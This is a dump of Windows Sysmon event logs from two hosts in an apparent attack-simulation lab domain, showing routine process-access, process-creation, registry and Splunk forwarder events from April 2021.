12:24:41.957{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291769Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.957{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291768Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.957{BEA10069-D0B7-6086-0200-00000000BB01}324840C:\Windows\System32\smss.exe{BEA10069-0289-6088-032A-00000000BB01}6720C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6cc4|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291767Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.957{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291766Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.957{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291765Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.957{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291764Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.957{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291763Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.957{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291762Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.956{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291761Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.956{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291760Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.956{BEA10069-D0B7-6086-0200-00000000BB01}324840C:\Windows\System32\smss.exe{BEA10069-0289-6088-032A-00000000BB01}6720C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\SYSTEM32\ntdll.dll+8c63e|C:\Windows\SYSTEM32\ntdll.dll+8c3e9|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+3c31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x8000000000000000291759Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.950{BEA10069-0289-6088-032A-00000000BB01}6720C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 0000010c 0000007c C:\Windows\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e73SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{BEA10069-D0B7-6086-0200-00000000BB01}324C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 23542300x8000000000000000291758Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.590{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F8E17B33AC7AACFDD217C6DB8D67A11,SHA256=FBE1FB335CC2E5965D33D8C138A029F793306A411EE785081B0915FFDE01A31F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440648Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:41.222{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440647Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:41.222{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440710Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.993{42DC5269-028A-6088-C228-00000000BA01}43043744C:\Windows\system32\csrss.exe{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\winsrv.DLL+1ef0|C:\Windows\system32\winsrv.DLL+17e9|C:\Windows\system32\winsrv.DLL+1579|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x8000000000000000440709Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.988{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6983FDBD9D4EAABD9D1D1683E6AA2EAD,SHA256=6DA8BE52B98A1DC0E6B32DCDCF5A8D464B7BE613869E7BE4883E3D2A0564471E,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000440708Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:42.915{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\NextInstanceDWORD (0x00000002) 13241300x8000000000000000440707Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:42.915{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\CountDWORD (0x00000002) 13241300x8000000000000000440706Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:42.915{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session3Mouse0 13241300x8000000000000000440705Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:42.915{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000002) 13241300x8000000000000000440704Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:42.915{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000002) 13241300x8000000000000000440703Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:42.915{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session3Mouse0 13241300x8000000000000000440702Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:42.913{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\NextInstanceDWORD (0x00000002) 13241300x8000000000000000440701Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:42.913{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\CountDWORD (0x00000002) 13241300x8000000000000000440700Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:42.913{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session3Keyboard0 13241300x8000000000000000440699Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:42.913{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000440698Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:42.913{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000001) 13241300x8000000000000000440697Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:42.913{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\0TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session3Keyboard0 10341000x8000000000000000440696Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.911{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440695Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.911{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440694Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.911{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292117Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.978{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292116Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.978{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292115Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.978{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292114Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.978{BEA10069-D4AB-6086-4301-00000000BB01}33842096C:\Windows\system32\csrss.exe{BEA10069-028A-6088-092A-00000000BB01}6536C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000292113Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.962{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292112Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 